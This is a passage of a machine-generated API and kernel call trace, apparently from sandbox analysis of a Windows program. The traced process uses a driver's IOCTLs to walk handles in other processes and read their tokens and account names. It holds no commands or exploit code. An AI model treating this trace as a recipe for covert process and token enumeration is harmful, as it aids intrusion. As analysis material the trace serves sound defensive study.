PROCESS=0xfffffa80037e1060, ApcState=0xfffff880052b35d0) [0225.481] ObReferenceObjectByHandle (in: Handle=0x4ac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003a669a0, HandleInformation=0x0) returned 0x0 [0225.481] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.481] PsReleaseProcessExitSynchronization () returned 0x2 [0225.482] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0225.482] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.482] ObfDereferenceObject (Object=0xfffffa8003a669a0) returned 0x1 [0225.482] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.482] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.482] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.482] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0225.482] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.482] PsAcquireProcessExitSynchronization () returned 0x0 [0225.482] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880052b35d0) [0225.482] ObReferenceObjectByHandle (in: Handle=0x4f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001170d80, HandleInformation=0x0) returned 0x0 [0225.482] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.482] PsReleaseProcessExitSynchronization () returned 0x2 [0225.482] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0225.482] ObQueryNameString (in: Object=0xfffff8a001170d80, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.482] ObfDereferenceObject (Object=0xfffff8a001170d80) returned 0x8 [0225.482] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.482] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0xc8 [0225.482] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0225.482] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa80037fe060, HandleInformation=0x0) returned 0x0 [0225.482] ObOpenObjectByPointer (in: Object=0xfffffa80037fe060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff80000654) returned 0x0 [0225.482] ObfDereferenceObject (Object=0xfffffa80037fe060) returned 0x89 [0225.482] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000654, DesiredAccess=0x8, TokenHandle=0xfffffa80028d8b40 | out: TokenHandle=0xfffffa80028d8b40*=0xc4) returned 0x0 [0225.482] ZwClose (Handle=0xffffffff80000654) returned 0x0 [0225.482] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.483] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0225.483] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0225.484] CloseHandle (hObject=0xc4) returned 1 [0225.484] CloseHandle (hObject=0xc8) returned 1 [0225.484] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.484] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0225.484] PsLookupProcessByProcessId (in: ProcessId=0x4c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.484] PsAcquireProcessExitSynchronization () returned 0x0 [0225.484] KeStackAttachProcess (in: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880052b35d0) [0225.485] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003822610, HandleInformation=0x0) returned 0x0 [0225.485] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.485] PsReleaseProcessExitSynchronization () returned 0x2 [0225.485] ObfDereferenceObject (Object=0xfffffa80037fe060) returned 0x87 [0225.485] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.485] ObfDereferenceObject (Object=0xfffffa8003822610) returned 0x1 [0225.485] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.485] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.485] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.485] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0225.485] PsLookupProcessByProcessId (in: ProcessId=0x4c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.485] PsAcquireProcessExitSynchronization () returned 0x0 [0225.485] KeStackAttachProcess (in: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880052b35d0) [0225.485] ObReferenceObjectByHandle (in: Handle=0x5c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80037e8730, HandleInformation=0x0) returned 0x0 [0225.485] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.485] PsReleaseProcessExitSynchronization () returned 0x2 [0225.485] ObfDereferenceObject (Object=0xfffffa80037fe060) returned 0x87 [0225.485] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.485] ObfDereferenceObject (Object=0xfffffa80037e8730) returned 0x1 [0225.485] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.485] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.486] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.486] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0225.486] PsLookupProcessByProcessId (in: ProcessId=0x4c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.486] PsAcquireProcessExitSynchronization () returned 0x0 [0225.486] KeStackAttachProcess (in: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880052b35d0) [0225.486] ObReferenceObjectByHandle (in: Handle=0xd0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0225.486] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.486] PsReleaseProcessExitSynchronization () returned 0x2 [0225.486] ObfDereferenceObject (Object=0xfffffa80037fe060) returned 0x87 [0225.486] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003087044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003087044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.486] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0225.486] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.486] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.486] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.486] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0225.486] PsLookupProcessByProcessId (in: ProcessId=0x4c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.486] PsAcquireProcessExitSynchronization () returned 0x0 [0225.486] KeStackAttachProcess (in: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880052b35d0) [0225.486] ObReferenceObjectByHandle (in: Handle=0xf4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0225.486] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.486] PsReleaseProcessExitSynchronization () returned 0x2 [0225.486] ObfDereferenceObject (Object=0xfffffa80037fe060) returned 0x87 [0225.487] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa800306d044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306d044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.487] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x23 [0225.487] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.487] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.487] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.487] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0225.487] PsLookupProcessByProcessId (in: ProcessId=0x4c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.487] PsAcquireProcessExitSynchronization () returned 0x0 [0225.487] KeStackAttachProcess (in: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880052b35d0) [0225.487] ObReferenceObjectByHandle (in: Handle=0x100, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0225.487] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.487] PsReleaseProcessExitSynchronization () returned 0x2 [0225.487] ObfDereferenceObject (Object=0xfffffa80037fe060) returned 0x87 [0225.487] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa800306e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.487] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x23 [0225.487] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.487] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.487] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.487] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x22, lpOverlapped=0x0) returned 1 [0225.487] PsLookupProcessByProcessId (in: ProcessId=0x4c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.487] PsAcquireProcessExitSynchronization () returned 0x0 [0225.487] KeStackAttachProcess (in: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880052b35d0) [0225.487] ObReferenceObjectByHandle (in: Handle=0x14c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80034c7670, HandleInformation=0x0) returned 0x0 [0225.487] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.487] PsReleaseProcessExitSynchronization () returned 0x2 [0225.488] ObfDereferenceObject (Object=0xfffffa80037fe060) returned 0x87 [0225.488] ObQueryNameString (in: Object=0xfffffa80034c7670, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.488] ObfDereferenceObject (Object=0xfffffa80034c7670) returned 0xb [0225.488] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.488] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.488] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.488] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x7c, lpOverlapped=0x0) returned 1 [0225.488] PsLookupProcessByProcessId (in: ProcessId=0x4c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.488] PsAcquireProcessExitSynchronization () returned 0x0 [0225.488] KeStackAttachProcess (in: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880052b35d0) [0225.488] ObReferenceObjectByHandle (in: Handle=0x1b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001232300, HandleInformation=0x0) returned 0x0 [0225.488] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.488] PsReleaseProcessExitSynchronization () returned 0x2 [0225.488] ObfDereferenceObject (Object=0xfffffa80037fe060) returned 0x87 [0225.488] ObQueryNameString (in: Object=0xfffff8a001232300, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.488] ObfDereferenceObject (Object=0xfffff8a001232300) returned 0x2 [0225.488] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.488] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.488] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.488] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8c, lpOverlapped=0x0) returned 1 [0225.488] PsLookupProcessByProcessId (in: ProcessId=0x4c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.488] PsAcquireProcessExitSynchronization () returned 0x0 [0225.488] KeStackAttachProcess (in: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880052b35d0) [0225.488] ObReferenceObjectByHandle (in: Handle=0x1c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80034c35f0, HandleInformation=0x0) returned 0x0 [0225.489] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.489] PsReleaseProcessExitSynchronization () returned 0x2 [0225.489] ObfDereferenceObject (Object=0xfffffa80037fe060) returned 0x87 [0225.489] ObQueryNameString (in: Object=0xfffffa80034c35f0, ObjectNameInfo=0xfffffa8003072044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003072044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.489] ObfDereferenceObject (Object=0xfffffa80034c35f0) returned 0x1 [0225.489] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.489] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.489] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.489] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x82, lpOverlapped=0x0) returned 1 [0225.489] PsLookupProcessByProcessId (in: ProcessId=0x4c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.489] PsAcquireProcessExitSynchronization () returned 0x0 [0225.489] KeStackAttachProcess (in: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880052b35d0) [0225.489] ObReferenceObjectByHandle (in: Handle=0x238, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80034c3980, HandleInformation=0x0) returned 0x0 [0225.489] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.489] PsReleaseProcessExitSynchronization () returned 0x2 [0225.489] ObfDereferenceObject (Object=0xfffffa80037fe060) returned 0x87 [0225.489] ObQueryNameString (in: Object=0xfffffa80034c3980, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.489] ObfDereferenceObject (Object=0xfffffa80034c3980) returned 0x11 [0225.489] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.489] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x588) returned 0xc8 [0225.489] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0225.489] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa80036a4060, HandleInformation=0x0) returned 0x0 [0225.489] ObOpenObjectByPointer (in: Object=0xfffffa80036a4060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff80000654) returned 0x0 [0225.489] ObfDereferenceObject (Object=0xfffffa80036a4060) returned 0x37 [0225.489] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000654, DesiredAccess=0x8, TokenHandle=0xfffffa80028d8b40 | out: TokenHandle=0xfffffa80028d8b40*=0xc4) returned 0x0 [0225.490] ZwClose (Handle=0xffffffff80000654) returned 0x0 [0225.490] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.490] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0225.490] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0225.491] CloseHandle (hObject=0xc4) returned 1 [0225.491] CloseHandle (hObject=0xc8) returned 1 [0225.491] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.491] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0225.491] PsLookupProcessByProcessId (in: ProcessId=0x588, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.491] PsAcquireProcessExitSynchronization () returned 0x0 [0225.491] KeStackAttachProcess (in: PROCESS=0xfffffa80036a4060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036a4060, ApcState=0xfffff880052b35d0) [0225.491] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80037e9070, HandleInformation=0x0) returned 0x0 [0225.492] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.492] PsReleaseProcessExitSynchronization () returned 0x2 [0225.492] ObfDereferenceObject (Object=0xfffffa80036a4060) returned 0x35 [0225.492] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.492] ObfDereferenceObject (Object=0xfffffa80037e9070) returned 0x1 [0225.492] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.492] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.492] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.492] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0225.492] PsLookupProcessByProcessId (in: ProcessId=0x588, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.492] PsAcquireProcessExitSynchronization () returned 0x0 [0225.492] KeStackAttachProcess (in: PROCESS=0xfffffa80036a4060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036a4060, ApcState=0xfffff880052b35d0) [0225.492] ObReferenceObjectByHandle (in: Handle=0x68, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003825130, HandleInformation=0x0) returned 0x0 [0225.492] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.492] PsReleaseProcessExitSynchronization () returned 0x2 [0225.492] ObfDereferenceObject (Object=0xfffffa80036a4060) returned 0x35 [0225.492] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8003077044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003077044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.492] ObfDereferenceObject (Object=0xfffffa8003825130) returned 0x1 [0225.492] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.492] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.492] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.492] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0225.493] PsLookupProcessByProcessId (in: ProcessId=0x588, 